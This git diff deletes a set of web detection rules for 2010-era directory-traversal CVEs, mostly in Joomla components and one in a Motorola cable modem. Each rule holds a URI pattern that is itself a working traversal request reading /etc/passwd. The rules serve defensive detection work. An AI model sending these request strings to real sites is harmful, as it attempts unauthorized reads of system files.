rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml delete mode 100644 rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml
diff --git a/rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml
deleted file mode 100644
index d6be923a..00000000
--- a/rules/web/web_cve_CVE-2010-0943 exploitation attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-0943 exploitation attempt
-id: 63b70c55-0d7a-4e2f-a130-11028352b6ff
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the JA Showcase (com_jashowcase)
- component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
- dot) in the controller parameter in a jashowcase action to index.php.
-references:
-- https://www.exploit-db.com/exploits/11090
-- https://www.cvedetails.com/cve/CVE-2010-0943
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml
deleted file mode 100644
index c38d952b..00000000
--- a/rules/web/web_cve_CVE-2010-0944 exploitation attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-0944 exploitation attempt
-id: d30903f7-cb51-445f-81a1-f2948f5fb763
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the JCollection (com_jcollection)
- component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
- dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/11088
-- https://www.cvedetails.com/cve/CVE-2010-0944
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml
deleted file mode 100644
index 70431ad7..00000000
--- a/rules/web/web_cve_CVE-2010-1306 exploitation attempt.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-title: CVE-2010-1306 exploitation attempt
-id: a12a5acd-3ebf-46b8-9ff3-95daeb84b801
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component
- 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files
- via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml
deleted file mode 100644
index 7faa239f..00000000
--- a/rules/web/web_cve_CVE-2010-1314 exploitation attempt.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-title: CVE-2010-1314 exploitation attempt
-id: 24c87e4f-7206-451a-9164-364ca4f3c388
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Highslide JS (com_hsconfig)
- component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files
- via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml
deleted file mode 100644
index 25b32926..00000000
--- a/rules/web/web_cve_CVE-2010-1345 exploitation attempt.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-title: CVE-2010-1345 exploitation attempt
-id: 5f723f65-f584-49f3-87c0-7babbae20d9d
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms)
- component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via
- a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml
deleted file mode 100644
index 1ba62bda..00000000
--- a/rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1353 exploitation attempt
-id: 26d15692-1cfc-4427-8e7d-9a364c2628f3
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox)
- component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
- dot) in the view parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12068
-- https://www.cvedetails.com/cve/CVE-2010-1353
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml
deleted file mode 100644
index 21b6dc41..00000000
--- a/rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-title: CVE-2010-1474 exploitation attempt
-id: 5b50ffc4-dde4-4905-9da9-eb499ee53971
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper)
- component 1.5.x for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://www.exploit-db.com/exploits/12182
-- https://www.cvedetails.com/cve/CVE-2010-1474
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml
deleted file mode 100644
index 4786c685..00000000
--- a/rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-title: CVE-2010-1475 exploitation attempt
-id: 69295f5a-428a-47d6-bf4d-a93bb23270ca
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive)
- component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml
deleted file mode 100644
index 9e3ef52a..00000000
--- a/rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1495 exploitation attempt
-id: e21410ad-5016-457a-a48f-2da871951471
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Matamko (com_matamko) component
- 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot)
- in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12286
-- https://www.cvedetails.com/cve/CVE-2010-1495
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml
deleted file mode 100644
index bb5f49b8..00000000
--- a/rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-title: CVE-2010-1532 exploitation attempt
-id: 92b23f0b-aa99-497a-a0f1-f7e632bcad7b
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail)
- component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml
deleted file mode 100644
index 31ae9336..00000000
--- a/rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-title: CVE-2010-1533 exploitation attempt
-id: 2e547af2-0fb1-4d26-829e-fb42d959133c
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the TweetLA (com_tweetla) component
- 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot
- dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml
deleted file mode 100644
index d2ee67cd..00000000
--- a/rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-title: CVE-2010-1535 exploitation attempt
-id: 7dbde0a0-bd74-47ba-85f7-32093ffbd50c
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the TRAVELbook (com_travelbook)
- component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml
deleted file mode 100644
index 564faaf9..00000000
--- a/rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-title: CVE-2010-1602 exploitation attempt
-id: d79bf48d-2705-4da1-929b-37e07764998f
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment)
- component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://www.exploit-db.com/exploits/12283
-- https://www.cvedetails.com/cve/CVE-2010-1602
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml
deleted file mode 100644
index 447bbe51..00000000
--- a/rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1657 exploitation attempt
-id: 7bdc9bd3-8dcd-4187-ab28-98b20cc1d020
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the SmartSite (com_smartsite) component
- 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot
- dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12428
-- https://www.cvedetails.com/cve/CVE-2010-1657
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml
deleted file mode 100644
index 148380f1..00000000
--- a/rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-title: CVE-2010-1718 exploitation attempt
-id: a538251c-d600-43f3-8051-c3a83a5e8702
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in archeryscores.php in the Archery
- Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to
- include and execute arbitrary local files via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml
deleted file mode 100644
index 94179320..00000000
--- a/rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1722 exploitation attempt
-id: 84715b18-505d-4252-9470-03c98a3006e5
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Online Market (com_market) component
- 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have
- unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12177
-- https://www.cvedetails.com/cve/CVE-2010-1722
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml
deleted file mode 100644
index 9bd796a5..00000000
--- a/rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-title: CVE-2010-1875 exploitation attempt
-id: af757e17-ad81-4a28-a551-49c17aa5113a
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Real Estate Property (com_properties)
- component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files
- and possibly have unspecified other impact via a .. (dot dot) in the controller
- parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/11851
-- https://www.cvedetails.com/cve/CVE-2010-1875
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml
deleted file mode 100644
index 4f10cf4e..00000000
--- a/rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1953 exploitation attempt
-id: 0fc4af77-6974-4e50-bf5e-9f175304eb54
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap)
- component 1.0 for Joomla! allows remote attackers to read arbitrary files via a
- .. (dot dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12288
-- https://www.cvedetails.com/cve/CVE-2010-1953
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml
deleted file mode 100644
index 23ef2619..00000000
--- a/rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-title: CVE-2010-1954 exploitation attempt
-id: 2ccf65c5-e4b3-48f6-961e-93bbd537ca80
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot)
- component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files
- via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml
deleted file mode 100644
index 10d81d67..00000000
--- a/rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1955 exploitation attempt
-id: 497c0911-226f-48a1-ac9f-518ffb98e65e
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory)
- component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via
- a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12238
-- https://www.cvedetails.com/cve/CVE-2010-1955
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml
deleted file mode 100644
index 80eb1897..00000000
--- a/rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1979 exploitation attempt
-id: 5b1c3030-e17b-43b3-b95e-952355a0f43f
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds)
- component build 880 for Joomla! allows remote attackers to read arbitrary files
- via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12088
-- https://www.cvedetails.com/cve/CVE-2010-1979
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml
deleted file mode 100644
index a29bfea4..00000000
--- a/rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1983 exploitation attempt
-id: c4f29c4f-0281-4518-a824-88f259d92ef5
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the redTWITTER (com_redtwitter)
- component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary
- files via a .. (dot dot) in the view parameter to index.php
-references:
-- https://www.exploit-db.com/exploits/12055
-- https://www.cvedetails.com/cve/CVE-2010-1983
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml
deleted file mode 100644
index 20b4dc70..00000000
--- a/rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-title: CVE-2010-2033 exploitation attempt
-id: b5c6267a-7b2e-47c8-84dd-68a89ceb1e64
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
- component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly
- have unspecified other impact via a .. (dot dot) in the controller parameter to
- index.php.
-references:
-- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
-- https://www.cvedetails.com/cve/CVE-2010-2033
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml
deleted file mode 100644
index f6c9adca..00000000
--- a/rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-title: CVE-2010-2036 exploitation attempt
-id: 5f89e5fb-6f87-4fee-96b2-700e987a1c7e
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
- component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly
- have unspecified other impact via a .. (dot dot) in the controller parameter to
- index.php.
-references:
-- https://www.exploit-db.com/exploits/34004
-- https://www.cvedetails.com/cve/CVE-2010-2036
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml
deleted file mode 100644
index 70cc525b..00000000
--- a/rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-2259 exploitation attempt
-id: 7ead4790-e0f8-41fa-bb14-f1d225964fd4
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component
- for Joomla! allows remote attackers to include and execute arbitrary local files
- via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/10946
-- https://www.cvedetails.com/cve/CVE-2010-2259
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml
deleted file mode 100644
index 32008b7c..00000000
--- a/rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-title: CVE-2010-2307 exploitation attempt
-id: 6e0a4fc5-c7a5-40c6-a080-bc5a452637a9
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Multiple directory traversal vulnerabilities in the web server for Motorola
- SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow
- remote attackers to read arbitrary files via (1) "//" (multiple leading slash),
- (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
-references:
-- https://www.securityfocus.com/bid/40550/info
-- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /../../etc/passwd
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml
deleted file mode 100644
index 01e0fedc..00000000
--- a/rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-title: CVE-2010-2682 exploitation attempt
-id: 5f7ea8cf-47e3-46e6-a173-43a99c904e43
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna)
- component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://www.exploit-db.com/exploits/14017
-- https://www.cvedetails.com/cve/CVE-2010-2682
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
